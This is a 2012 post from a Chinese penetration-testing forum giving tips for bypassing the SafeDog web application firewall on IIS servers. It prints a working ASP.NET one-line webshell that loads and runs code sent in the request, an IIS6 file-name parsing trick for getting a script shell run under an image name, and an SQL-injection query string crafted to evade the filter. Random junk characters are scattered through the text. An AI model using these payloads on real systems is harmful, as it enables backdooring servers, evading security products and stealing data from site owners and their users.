中国网络渗透测试联盟

标题: 突破安全狗防注入及上传的一些思路 [打印本页]

作者: admin    时间: 2012-10-31 08:25
标题: 突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。  E; V# X0 }) u+ E
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
: T5 Y; d5 @5 y" q, h" v2 g<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。& T+ r, i% ^4 V: G9 k- v: e$ n8 s/ {

, f6 [9 t- g$ M: @* p3 D% n2、IIS6.0解析漏洞遇到安全狗。
2 x+ X; N* k$ a$ C9 v/ o文件名为1 h  l8 s9 p5 ]2 F- s
http://www.xxxxx.com/sh3llc0de.asp;1.jpg4 @5 P: k: {8 g

1 ?- X4 D; s" u% F; V这样的会被IIS安全狗果断屏蔽。
5 U+ m. a! l8 |) O0 _8 e改成如下名称,IIS6一样会解析:! @# d2 h! u! p8 \3 \+ G1 ~* p
www.xxxxx.com/;1.asp;1.jpg( ~. n( e5 Y2 ?
8 J/ p0 C/ V& t2 G
3、安全狗的注入绕过。
1 D+ Q3 R# V! s/ ~5 ~8 n常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。0 Z* Y0 t& m" ^
但如果:5 k+ }2 I7 T- i  z: A& U4 W
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
: ~& \6 G  |- ?! j- ~( M  O就可以成功绕过了。
4 [1 E$ w6 U9 h- D1 B# N/ ]4 t! s3 N$ p7 g( F7 I$ _+ m

& o$ e9 @+ X5 k: s




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2